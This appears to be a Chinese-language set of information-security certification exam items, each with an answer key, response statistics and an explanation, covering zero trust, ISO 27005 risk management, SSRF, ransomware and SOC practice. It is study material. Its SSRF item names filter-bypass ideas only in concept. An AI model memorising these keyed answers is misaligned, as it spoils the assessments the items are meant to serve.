**19. 某智慧製造工廠計畫導入零信任安全架構(Zero Trust Architecture, ZTA)以保護其營運技術(Operational Technology, OT)網路，相較於傳統的資訊技術(Information Technology, IT)環境，在 OT 場域中實施 ZTA 時，面臨的最大挑戰通常是什麼？**
(A) 使用者身分多元，難以統一管理
(B) 缺乏足夠的網路頻寬來處理持續的驗證請求
(C) 大量老舊的工業控制系統(ICS)與設備不支援現代化的身分驗證協定
(D) OT 環境中的資料流量過於龐大，難以進行深度封包檢測(Deep Packet Inspection, DPI)

> **答案：C**
> 統計：A(3), B(2), C(52), D(7)
>
> 解析：OT 環境大量老舊 ICS 設備（如 PLC、SCADA）不支援現代化身分驗證協定（如 SAML、OIDC），這是導入 ZTA 最大的實務障礙。A 身分管理 IT 環境也有、B 頻寬不是核心問題、D DPI 與 ZTA 部署挑戰關聯較弱。

**20.（複選）企業可實際應用下列哪些防護措施，以協助降低勒索軟體的風險？**
(A) 定期執行異地備份重要資料
(B) 禁用所有資料加密功能以防止勒索軟體加密資料
(C) 使用應用程式白名單機制
(D) 僅依賴作業系統的內建安全功能

> **答案：A, C**
> 統計：A(57), B(9), C(58), D(3)
>
> 解析：定期異地備份（A）確保被加密後仍有資料可復原，應用程式白名單（C）阻止未授權程式（包含勒索軟體）執行。B「禁用加密功能」荒謬，加密是正常功能不能禁；D「僅依賴 OS 內建安全功能」不足以應對勒索軟體。

**23.【題組 3】情境如下：**

> 某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。

**因關稅考量，公司決定於美國增設一生產基地，以提高商品的競爭力，原營業據點將遷移至生產基地，相關業務人員採遠端辦公，下列何者措施有助於公司集中控管資訊系統同時可以符合遠端辦公的需求？**
(A) 導入精簡用戶端配合虛擬桌面基礎架構(VDI)
(B) 導入零信任架構(ZTA)
(C) 在所有筆電啟用 BitLocker 全磁碟加密
(D) 宣導員工使用私人電腦進行遠端連線

> **答案：A**
> 統計：A(46), B(17), C(1), D(1)
>
> 解析：精簡用戶端＋VDI 同時滿足「集中控管資訊系統」和「遠端辦公」兩個需求，資料不落地、集中管理。B ZTA 是存取控制架構不是系統集中管理、C BitLocker 只保護磁碟加密、D 私人電腦更不利集中管控。17 人選 B 是只想到 ZTA 好用但沒扣題。

**29.【題組 4】情境如圖所示，XYZ 公司將導入資訊安全管理系統 (Information Security Management System, ISMS)標準，依循 ISO 27005 及 ISO 31000 進行風險管理時，各項風險管理作業逐層彙要列示如：【1.風險回應、2.建立全景、3.風險分析及評估、4.風險識別、5.風險評鑑、6.風險處理、7.記錄及報告】。**

![題組4情境圖](https://hackmd.io/_uploads/SJyRjSaKbx.png)

**並且依標準將「監視與審查」與「溝通及諮詢」作業貫穿於整個風險管理流程之中，請問下列何者為正確的風險管理流程順序？**
(A) 13456
(B) 54317
(C) 24367
(D) 25431

> **答案：C**
> 統計：A(1), B(6), C(49), D(8)
>
> 解析：依 ISO 27005/ISO 31000 標準流程：建立全景(2)→風險識別(4)→風險分析及評估(3)→風險處理(6)→記錄及報告(7)，即 24367。「監視與審查」及「溝通及諮詢」貫穿全程不列入排序。「風險回應(1)」與「風險評鑑(5)」在此排序中未被使用，屬干擾項。

**【題組 4】情境如圖所示，XYZ 公司將導入資訊安全管理系統 (Information Security Management System, ISMS)標準，依循 ISO 27005 及 ISO 31000 進行風險管理時，各項風險管理作業逐層彙要列示如：【1.風險回應、2.建立全景、3.風險分析及評估、4.風險識別、5.風險評鑑、6.風險處理、7.記錄及報告】。**

![題組4情境圖](https://hackmd.io/_uploads/SJyRjSaKbx.png)

**（複選）XYZ 公司在開發新產品時所面臨的資安風險，請問有下列哪些方式可以導入處理？**
(A) 當產品開發測試階段完成後再處理所有安全問題
(B) 產品安全事件管理上需通知客戶相關風險並提供產品安全修補，並納入新產品的設計考量之中
(C) 產品開發設計階段進行威脅建模以分析潛在漏洞
(D) 使用靜態程式碼分析工具檢查程式碼安全

> **答案：B, C, D**
> 統計：A(4), B(55), C(58), D(49)
>
> 解析：B 通知客戶風險並修補、納入新產品設計是 PSDLC 的事件回應與持續改善；C 威脅建模（Threat Modeling）是設計階段的標準安全實務；D 靜態分析（SAST）是開發階段的安全檢測。三者都是 Secure SDLC 的正確做法。A「測試完成後再處理所有安全問題」違反「安全左移（Shift Left）」原則，安全問題應在各階段即時處理，不是全部堆到最後。

**35. 在網站憑證使用風險對策上，下列何者最「不」適切？**
(A) 外部網站憑證必須要納入資訊資產，確保其可用性
(B) 內部系統網站，也必須要採用外部簽發的憑證
(C) 網站憑證的簽發單位也必須納入風險評估的一環
(D) 網站憑證必須要設定到期前提醒之巡查流程

> **答案：B**
> 統計：A(8), B(47), C(4), D(2)
>
> 解析：內部系統網站不一定「必須」採用外部簽發的憑證，內部 CA（企業內部憑證授權中心）簽發的憑證在內網環境完全適用且更具管控彈性。A 憑證納入資產管理確保可用性正確、C 簽發單位（CA）的信任度與安全性當然要評估、D 到期前提醒避免憑證過期導致服務中斷也正確。8 人選 A 可能是不熟悉憑證也算資訊資產。

**36.（複選）有關風險處理計畫之敘述，下列哪些項目最為適切？**
(A) 風險處理計畫之目的為規範如何實施選定之風險處理選項
(B) 風險處理計畫應明確鑑別風險處理實施之順序
(C) 風險處理計畫之內容必須包含所有外部關注方之回饋
(D) 風險處理計畫之內容應包含風險當責者及核准與實施風險處理計畫之人員

> **答案：A, B, D**
> 統計：A(54), B(55), C(14), D(54)
>
> 解析：依 ISO 27001/ISO 27005，風險處理計畫應包含：實施方式(A)、優先順序(B)、當責者與核准人員(D)。C「必須包含所有外部關注方之回饋」的「必須」和「所有」太絕對，風險處理計畫會考量利害關係人意見但不是「必須包含所有外部回饋」。14 人選 C 是被「外部關注方」這個看起來很正式的用語誤導。

**38.【題組 5】情境如下：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並損毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM⋯等業務系統全面癱瘓，生產與供應鏈亦因而停擺。**

**關於此事件之風險處理，下列何者最「不」合適？**
(A) 風險降低(Risk Reduction)
(B) 風險避免(Risk Avoidance)
(C) 風險接受(Risk Acceptance)
(D) 風險轉移(Risk Transfer)

> **答案：C**
> 統計：A(1), B(10), C(50), D(6)
>
> 解析：事件已造成重大損失（系統全面癱瘓、生產停擺、1TB 機密外洩），此時「風險接受」完全不合適——風險已經實現且衝擊巨大，不能接受不處理。A 風險降低（加強防護措施）合適、B 風險避免（停止高風險活動）合適、D 風險轉移（買保險）合適。10 人選 B 可能覺得事後不能「避免」，但企業可以選擇避免某些高風險的業務模式來防止再次發生。

### 適中

**3. 金管會於 2024 年 7 月發布《金融業導入零信任架構參考指引》，將導入措施分為四級(Level I–IV)。若在資源存取時，將「時間、地點、設備合規狀態」等動態屬性納入授權審核條件，並可對異常樣態進行動態撤銷、限縮存取或即時告警，請問該作法屬於下列哪一級的資安管控措施？**
(A) 第一級 靜態指標
(B) 第二級 融入動態指標
(C) 第三級 以即時指標為主
(D) 第四級 最佳化整合指標

> **答案：B**
> 統計：A(1), B(44), C(17), D(12)
>
> 解析：四級區分邏輯：L1 靜態驗證→L2 加入動態情境→L3 即時持續監控→L4 全面整合最佳化。題目描述「將動態屬性納入授權審核」是「開始融入」動態因素的階段，對應第二級。選 C 的人誤判為即時監控，但 L3 強調的是「以即時指標為主」的持續驗證，程度更高。

**4.（複選）近年資通安全事件與日俱增，為使上市公司充分揭露重大資安事件，保障投資人知的權利，證交所已修訂重大訊息問答集明確規範資安事件之「重大性」標準。關於造成公司重大損害或影響之描述，下列哪些最正確？**
(A) 媒體報導公司發生資通安全事件，可能影響投資人之投資決策
(B) 僅公司核心資通系統、官方網站等，遭駭客攻擊入侵致無法營運或正常提供服務
(C) 公司有個資、內部文件檔案資料外洩之虞等情事
(D) 公司對造成損害或影響之評估結果(如財務損失)，可能影響投資人之投資決策

> **答案：A, C, D**
> 統計：A(60), B(23), C(64), D(59)
>
> 解析：B 選項的「僅」字是陷阱——重大性標準不限於核心系統，非核心系統被攻擊導致無法營運也可能構成重大性。A（媒體報導影響投資決策）、C（個資／內部文件外洩之虞）、D（損害評估影響投資決策）均符合重大性標準。23 人選 B 就是被「僅」字絆住沒注意。

**8.【題組 1】情境如下：**

> 一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統(EHR)」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。

**（複選）身為該醫療中心的資安長(CISO)，為了建構一個同時兼具彈性與韌性的安全防護體系，防止此類結合供應鏈與內部人員的攻擊再次發生，下列哪些安全架構與管理措施應被納入改善計畫？**
(A) 在所有端點(包含開發者筆電)部署端點偵測與應變 (Endpoint Detection and Response, EDR)系統
(B) 制定並落實嚴格的特權存取管理(Privileged Access Management, PAM)政策，採最小權限原則
(C) 為所有關鍵系統(如EHR)的存取啟用基於風險評估的適應性多因子認證(Adaptive MFA)
(D) 要求所有遠端工作模式，均需配置單向閘道傳輸器，以確保作業安全

> **答案：A, B, C**
> 統計：A(54), B(60), C(52), D(15)
>
> 解析：EDR（端點偵測）、PAM（特權管理）、Adaptive MFA 三者都是對應情境中供應鏈＋內部人員攻擊的合理改善措施。D「單向閘道傳輸器」雖是資安術語（常見於 OT 環境的資料二極體），但要求「所有遠端工作均需配置」說法過於絕對且不符遠端辦公場景。15 人選 D 是沒注意到適用範圍不合理。

**14.【題組 2】情境如下：**

> 近年來，人工智慧的應用有效的協助企業組織完成許多繁難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒，依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。
>
> 資安部門據此推動以下控制措施：
> (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。
> (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。
> (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。
> (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低驗款人員身份遭到盜用。
> (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。
> (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管覆核同意後始得匯款。
> (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。

**請問為了有效防範 AI 深度偽造技術的語音與影像攻擊，降低組織同仁受到詐騙將公司的款項匯出造成組織的營運損失，下列何項推動組合最為無效？**
(A) (1)(2)
(B) (2)(3)
(C) (3)(4)
(D) (4)(5)

> **答案：D**
> 統計：A(7), B(9), C(12), D(41)
>
> 解析：(4) MFA 保護的是系統登入身份驗證，不是防 Deepfake 語音詐騙；(5) 郵件加密防的是資料外洩，跟 Deepfake 偽造攻擊無關。這兩個措施雖然是好的資安實務，但對「防止被 AI 偽造語音影像騙匯款」最沒直接效果。12 人選 C=(3)(4) 是沒想清楚教育訓練 (3) 其實對防 Deepfake 有效。

**28.（複選）進行電子郵件系統風險評估時，下列哪些選項為可用性評估的考量因素？**
(A) 電子郵件系統的備援方式
(B) 最適可用人數的評估
(C) 電子郵件系統管理者登入密碼之管制方式
(D) 電子郵件系統負載平衡運作方式

> **答案：A, B, D**
> 統計：A(60), B(51), C(22), D(55)
>
> 解析：題目關鍵字是「可用性（Availability）」。A 備援方式直接影響系統持續運作能力；B 最適可用人數屬容量規劃，影響服務能否正常提供；D 負載平衡確保流量分散避免單點過載。三者皆為可用性考量。C「管理者登入密碼管制方式」屬於機密性（Confidentiality）的存取控制議題，非可用性。22 人誤選 C 是把「存取控制」與「可用性」混淆。

**31.【題組 4】情境如圖所示，XYZ 公司將導入資訊安全管理系統 (Information Security Management System, ISMS)標準，依循 ISO 27005 及 ISO 31000 進行風險管理時，各項風險管理作業逐層彙要列示如：【1.風險回應、2.建立全景、3.風險分析及評估、4.風險識別、5.風險評鑑、6.風險處理、7.記錄及報告】。**

![題組4情境圖](https://hackmd.io/_uploads/SJyRjSaKbx.png)

**XYZ 公司風險評估後，決定導入「產品安全開發生命週期(Product Security Development Life Cycle, PSDLC)」管理制度與定期稽核，此程序主要是屬於下列哪一類型的風險處理措施？**
(A) 風險修改(Risk Modification)
(B) 風險避免(Risk Avoidance)
(C) 風險保留(Risk Retention)
(D) 風險分擔(Risk Sharing)

> **答案：A**
> 統計：A(38), B(17), C(4), D(8)
>
> 解析：導入 PSDLC 管理制度與定期稽核，目的是透過增加控制措施來「降低風險的可能性或衝擊」，這就是風險修改（Risk Modification）的定義。B 風險避免是完全不做該活動（例如不開發產品）；C 風險保留是接受風險不做處理；D 風險分擔是將風險轉移給第三方（如保險、外包）。17 人選 B 是把「導入制度降低風險」誤解為「避免風險」，但公司並沒有放棄產品開發，只是增加控制。

### 困難

**9. 關於零信任架構(ZTA)的描述，下列何者較「不」正確？**
(A) 相當適用於防禦內部攻擊或受到入侵後的橫向移動
(B) 存取資源時由政策執行點(Policy Enforcement Point, PEP)向政策決策點(Policy Decision Point, PDP)詢問是否應該允許存取資源
(C) 詳細的 ZTA 架構說明描述於 NIST SP 800-217 中
(D) 端對端的加密通訊使得零信任架構的部署更具挑戰

> **答案：C**
> 統計：A(7), B(7), C(31), D(26)
>
> 解析：ZTA 的詳細架構說明出自 **NIST SP 800-207**，不是 SP 800-217。這是純記憶題，沒讀過就只能猜。26 人選 D 是因為覺得加密增加部署難度的描述「太正確」而反向排除，但 D 本身描述確實是正確的（加密流量讓 ZTA 的流量檢查更複雜）。

**22.【題組 3】情境如下：**

> 某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。

**國內總公司因應海外客戶的要求，其特別重視個資保護，故要求公司需要通過 ISO 27701 隱私資訊安全驗證，請問下列何項措施最「不」適切？**
(A) 審視 ISO/IEC 27001 資訊安全管理驗證的範疇是否符合需求
(B) 積極尋求通過 BS 10012 個人資訊管理驗證
(C) 選擇業務部門優先導入 ISO/IEC 27701 資訊安全管理驗證
(D) 選擇生產基地優先導入 ISO/IEC 27701 資訊安全管理驗證

> **答案：B**
> 統計：A(8), B(26), C(9), D(21)
>
> 解析：客戶要求的是 ISO 27701（隱私資訊管理系統，PIMS），B 選的是 BS 10012（英國的個人資訊管理標準），雖然也是隱私相關但並非客戶指定的 ISO 27701，方向不對。A 審視 27001 範疇是導入 27701 的前置步驟（因為 27701 是 27001 的延伸）、C 業務部門優先導入合理、D 生產基地優先也合理。21 人選 D 是覺得生產基地不該優先，但題目沒說不行。

**24.【題組 3】情境如下：**

> 某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。

**（複選）歐洲地區的業務人員多採遠距辦公，由公司配發筆記型電腦供員工使用，主要採用 Windows 10 作業系統，請問下列哪些措施最能降低公司機密外流的風險？**
(A) 為員工提供虛擬私人網路(VPN)以加密存取內部資源
(B) 啟用 BitLocker 磁碟加密功能
(C) 作業系統禁止使用無線區域網路
(D) 導入精簡用戶端配合雲端桌面

> **答案：A, B, D**
> 統計：A(58), B(57), C(22), D(41)
>
> 解析：VPN（A）保護傳輸安全、BitLocker（B）保護磁碟被竊時資料安全、精簡用戶端配雲端桌面（D）資料不落地。C「禁止使用無線區域網路」太極端，遠端辦公不可能不用 WiFi，實務上不可行。22 人選 C 是沒考慮遠端辦公場景的實際限制。

### 非常困難

（本次無）

---

## 114-2 資訊安全防護實務

### 非常簡單

**2. 伺服器端請求偽造(Server Side Request Forgery, SSRF)是過去幾年很流行的攻擊手法，下列關於 SSRF 的描述何項「錯誤」？**
(A) 有機會用來對內網進行 port scan
(B) 有機會透過 file:// 協定讀取系統檔案，例如讀取 Linux 作業系統的 /etc/passwd
(C) 只要使用正規表示式把 10.0.0.0 - 10.255.255.255、172.16.0.0 - 172.31.255.255、192.168.0.0 - 192.168.255.255 從參數內容過濾掉，攻擊者就無法透過 SSRF 存取內網
(D) 有機會透過 dict:// 協定存取 Redis 資料庫

> **答案：C**
> 統計：A(2), B(1), C(61), D(2)
>
> 解析：SSRF 繞過內網 IP 過濾的手法非常多：可用 DNS rebinding、URL 編碼、IPv6 映射（如 [::ffff:10.0.0.1]）、十進位/八進位 IP 表示法（如 0x0A000001）、短網址跳轉等。「只要正規表示式過濾私有 IP 範圍就安全」的說法太絕對，故 C 錯誤。A/B/D 都是 SSRF 的常見利用方式。

**3. 釣魚攻擊中常見的「憑證收集(Credential Harvesting)」指的是下列何種做法？**
(A) 植入遠端存取木馬(Remote Access Trojan, RAT)
(B) 對硬碟進行全碟資料傾印(Dumper)
(C) 利用 CAPTCHA 阻擋分析
(D) 偽裝成登入頁面，以騙取使用者的帳號與密碼

> **答案：D**
> 統計：A(3), B(0), C(5), D(58)
>
> 解析：Credential Harvesting 就是「收割憑證」，最典型做法是建立假的登入頁面（如偽造 Google、Microsoft 365 登入畫面），誘騙受害者輸入帳密。A 是後門植入、B 是資料傾倒、C 是反分析技術，都不是憑證收集的定義。

**4.（複選）為了防範常見的網站應用程式攻擊，如 SQL 注入(SQL Injection)與跨網站指令碼(XSS)，開發團隊在設計安全架構時，應實施下列哪些防護與應變技術最為適切？**
(A) 在伺服器端採用參數化查詢(Parameterized Queries)或預處理敘述(Prepared Statements)來處理所有資料庫操作
(B) 在網頁前端實作嚴格的內容安全策略(Content Security Policy, CSP)以限制外部腳本的載入與執行
(C) 對所有使用者輸入的資料，在輸出至網頁時進行適當的編碼(Output Encoding)
(D) 僅在 HTTP 協定上運行網站，避免 HTTPS 加密造成的效能損耗

> **答案：A, B, C**
> 統計：A(61), B(60), C(59), D(0)
>
> 解析：A 參數化查詢防 SQL Injection 是標準做法；B CSP 限制腳本載入防 XSS；C Output Encoding 防止使用者輸入被當成 HTML/JS 執行，也防 XSS。三者都是 OWASP 推薦的防護技術。D「僅用 HTTP 避免 HTTPS 效能損耗」完全錯誤，HTTPS 是基本安全要求，現代硬體下效能影響微乎其微。

**9. 下列哪一種資訊安全框架特別強調治理(Govern)、識別(Identify)、保護(Protect)、偵測(Detect)、回應(Respond)與復原(Recover)六大面向？**
(A) ISO 27001
(B) CIS CSC
(C) NIST Cybersecurity Framework v2(CSF)
(D) Zero Trust

> **答案：C**
> 統計：A(2), B(2), C(58), D(1)
>
> 解析：NIST CSF 2.0 的六大功能就是 Govern、Identify、Protect、Detect、Respond、Recover，題幹幾乎是直接照抄定義。注意 CSF 2.0 新增了 Govern（治理）面向，舊版 1.1 只有五個。A ISO 27001 是 ISMS 管理系統標準、B CIS CSC 是控制措施清單、D Zero Trust 是架構概念非框架。

**10. 安全營運中心(SOC)接獲終端偵測與回應(EDR)警報，指出某個人電腦端點可能執行 Cobalt Strike Beacon。為在不影響業務的前提下「快速遏制」並「保全證據」，第一時間最適合採取下列何項作法？**
(A) 立即關閉端點電源
(B) 啟動端點重灌電腦
(C) 隔離端點網路，並同時擷取 RAM 與磁碟的鑑識鏡像
(D) 啟動端點防毒進行全碟掃描

> **答案：C**
> 統計：A(1), B(0), C(62), D(0)
>
> 解析：「快速遏制」＋「保全證據」兩個需求同時滿足的只有 C：網路隔離阻止 Beacon 回連 C2 伺服器（遏制），同時擷取 RAM（保留記憶體中的惡意程式痕跡）與磁碟鏡像（保全證據）。A 關電源會丟失 RAM 中的 volatile 證據、B 重灌直接毀證據、D 防毒掃描可能改變磁碟狀態影響鑑識。

**11. 依據美國國家標準技術研究院(NIST)特別出版品 800-34(SP800-34)中的相關規定，在進行業務衝擊分析(Business Impact Analysis, BIA)時，下列何項最能正確描述 BIA 的核心目標？**
(A) 評估資訊系統的技術漏洞，以便制定防護策略
(B) 確定關鍵業務流程及其對資源中斷的影響，並設定復原優先級
(C) 開發系統架構以確保業務流程的持續性
(D) 測試災難復原計劃的可行性，並提供改進建議

> **答案：B**
> 統計：A(5), B(55), C(1), D(2)
>
> 解析：BIA 的核心目標就是「識別關鍵業務流程、評估中斷對組織的影響、設定復原優先順序」。A 是弱點評估不是 BIA、C 是系統架構設計、D 是災難復原測試。BIA 是 BCP/DRP 的前置步驟，先搞清楚哪些業務最重要、中斷多久會造成多大損失。

**12. 依據 SANS 工業控制系統殺戮鏈(SANS Industrial Control System Kill Chain)，若在營運技術網路（Operational Technology, OT)偵測到大量 Modbus 功能碼 0x10(Write Multiple Registers)的非預期封包，下列何種即時防禦措施最符合「最小影響但高效遏制」原則？**
(A) 於核心路由器啟用 Geofencing 阻斷來源 IP
(B) 立即更新所有 PLC 韌體
(C) 立刻切斷工控網與 IT 網的所有連線
(D) 於入侵防禦系統(IPS)套用 Modbus 深度解析規則，並將 Write 多筆暫存器行為設為只讀或阻斷

> **答案：D**
> 統計：A(8), B(0), C(6), D(52)
>
> 解析：「最小影響但高效遏制」＝精準阻斷異常但不影響正常運作。D 在 IPS 上套用 Modbus 協定深度解析規則，只針對 0x10 Write Multiple Registers 的異常封包進行阻斷或設為只讀，精準且影響最小。A Geofencing 阻斷來源 IP 可能誤殺正常流量、B 更新 PLC 韌體不是即時防禦措施且風險高、C 切斷所有 IT/OT 連線影響太大違反「最小影響」原則。

**14.（複選）一家企業正計畫將大型語言模型(LLM)整合至其內部知識庫系統，以提供員工智慧問答服務。為了防範與生成式 AI 相關的安全風險，下列哪些是資安團隊應優先實施的控制措施？**
(A) 對使用者輸入的提示(Prompt)進行過濾與淨化，以防範提示注入(Prompt Injection)攻擊
(B) 部署 Layer 4 網路防火牆(Network Firewall)
(C) 建立嚴格的資料外洩防護(Data Loss Prevention, DLP)規則，監控並阻擋模型輸出中可能包含的敏感資訊
(D) 實施基於角色的存取控制(Role-Based Access Control, RBAC)，確保僅有授權員工能存取特定主題的知識庫與模型互動

> **答案：A, C, D**
> 統計：A(57), B(2), C(60), D(61)
>
> 解析：A Prompt 過濾淨化防 Prompt Injection 是 LLM 安全基本功；C DLP 規則防止模型輸出包含敏感資訊（如內部機密、個資）；D RBAC 控制誰能存取哪些知識庫主題。三者都是 LLM 整合時應優先實施的控制。B Layer 4 網路防火牆只看 TCP/UDP 層，無法理解應用層的 LLM 互動內容，對 Prompt Injection 和資料外洩完全無效。

**18.【題組 2】情境如附圖所示。承上題，請問下列何項不是分散式阻斷服務(DDoS)攻擊的破壞目的？**

![題組2情境圖一](https://hackmd.io/_uploads/BJh8NUatWl.png)
![題組2情境圖二](https://hackmd.io/_uploads/r1owVUTF-e.png)
![題組2情境圖三](https://hackmd.io/_uploads/H1qOVU6tbe.png)
(A) 癱瘓系統服務主機
(B) 破壞系統服務程式
(C) 影響網頁服務正常運作
(D) 塞爆服務網路的頻寬

> **答案：B**
> 統計：A(4), B(59), C(0), D(1)
>
> 解析：DDoS 攻擊的目的是讓服務「不可用」，手段包括癱瘓主機(A)、影響網頁正常運作(C)、壅塞頻寬(D)。B「破壞系統服務程式」不是 DDoS 的目標——DDoS 是用大量流量/請求「淹沒」服務，不是「破壞」程式碼本身。要破壞程式需要的是 RCE 或惡意軟體，不是 DDoS。

**23. Android 作業系統為提昇安全性，在專用硬體元件中提供下列何項生成/保護加密金鑰的機制？**
(A) 共用偏好設定(Shared Preferences)
(B) 內部儲存(Internal Storage)
(C) 可信執行環境(Trusted Execution Environment, TEE)
(D) 外部儲存(External Storage)

> **答案：C**
> 統計：A(2), B(5), C(57), D(2)
>
> 解析：TEE（可信執行環境）是 Android 在專用硬體元件（如 ARM TrustZone）中提供的安全區域，用於生成與保護加密金鑰，確保金鑰不會暴露在一般作業系統環境中。A Shared Preferences 是 App 的鍵值對儲存機制、B Internal Storage 是 App 私有的檔案儲存、D External Storage 是共用的外部儲存空間，三者都不是硬體層級的金鑰保護機制。

**25.【題組 3】情境如附圖所示。某關鍵基礎設施組織近日遭受新型勒索軟體攻擊，導致部分 OT 系統和生產控制面臨停擺威脅。資安營運中心(Security Operations Center, SOC)在事件回應中，針對此類涉及 OT 的勒索軟體事件處理優先序，下列描述何者較為適切？**

> 近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。

(A) 由於勒索軟體通常只影響特定檔案，且 OT 系統穩定性優先，應優先進行系統備份，然後等待 OT 維運團隊排程處理，避免額外干擾
(B) 勒索軟體屬一般惡意軟體，主要任務是收集鑑識證據以追溯攻擊者，OT 系統的影響可稍後評估
(C) 此類事件優先序極高，可能對實體安全和關鍵業務營運造成嚴重中斷，需立即啟動遏制與恢復措施，並與 OT 擁有者密切合作
(D) 優先順序取決於是否支付贖金，若已決定支付則回應優先順序可降低，以便與攻擊者協商

> **答案：C**
> 統計：A(1), B(0), C(60), D(0)
>
> 解析：OT 環境的勒索軟體事件涉及實體安全（工業控制、生產線），優先序極高，必須立即遏制與恢復。A「等待排程處理」太消極，OT 遭攻擊可能危及人身安全不能等；B「稍後評估 OT 影響」同樣輕忽了 OT 的即時性；D「取決於是否支付贖金」完全錯誤，事件回應不應以付贖金為決策依據。

**26.【題組 3】情境如附圖所示。鑑於近期持續不斷的 APT 攻擊，資安營運中心(Security Operations Center, SOC)在利用網路威脅情資(Cyber Threat Intelligence, CTI)時，對於採用 MITRE ATT&CK 這類框架的主要價值，下列描述何者最為正確？**

> 近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。

(A) MITRE ATT&CK 提供詳盡的特定攻擊者 IP 位址和網域名稱列表，便於 SOC 立即封鎖，是唯一實用的情資來源
(B) MITRE ATT&CK 能夠自動且絕對地將攻擊歸因於特定國家級行為者，簡化歸因過程，減少分析師工作量
(C) MITRE ATT&CK 的主要目的是為 SOC 提供自動化的威脅偵測工具，取代人工分析師的判斷，達到全面自動化
(D) MITRE ATT&CK 提供一套基於真實世界觀察的威脅者戰術、技術與程序(TTPs)知識庫，有助於 SOC 理解威脅者行為模式

> **答案：D**
> 統計：A(1), B(1), C(7), D(54)
>
> 解析：MITRE ATT&CK 是基於真實世界觀察所建構的 TTPs 知識庫，幫助 SOC 理解攻擊者的行為模式與手法。A 說「唯一實用的情資來源」且 ATT&CK 不提供具體 IP/域名列表；B 說「自動且絕對地歸因」太誇張；C 說「取代人工分析師」和「全面自動化」也不正確，ATT&CK 是知識框架不是自動化工具。

**27.【題組 3】情境如附圖所示。隨著企業逐步採用雲端服務與遠端工作模式，對端點偵測與回應(Endpoint Detection and Response, EDR)工具在資安監控中的作用日益凸顯。關於 EDR 能力對資安營運中心(Security Operations Center, SOC)在偵測與確認入侵方面的價值，下列描述何者最為正確？**

> 近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。

(A) EDR 主要用於監控網路流量，以發現已知惡意程式碼的特徵碼，與傳統 IDS 無異
(B) EDR 提供的資訊與傳統網路流量資料相比，在確認入侵方面較不具參考價值，因為它可能被攻擊者規避
(C) EDR 系統提供來自端點的強大偵測和豐富的監控數據，使其資料在確認入侵方面通常比網路流量資料更具資訊性
(D) EDR 僅是一種傳統防毒解決方案的升級版，不具備進階威脅偵測能力，無法應對 APT 級攻擊

> **答案：C**
> 統計：A(1), B(1), C(60), D(1)
>
> 解析：EDR 的核心價值在於從端點收集豐富的行為數據（程序執行、檔案操作、Registry 變更、網路連線等），比傳統網路流量資料更能確認入侵行為。A 把 EDR 等同 IDS 是錯的，EDR 在端點層不在網路層；B 說 EDR 資訊不具參考價值是反過來了；D 說 EDR 只是防毒升級版、無法應對 APT 也完全錯誤。

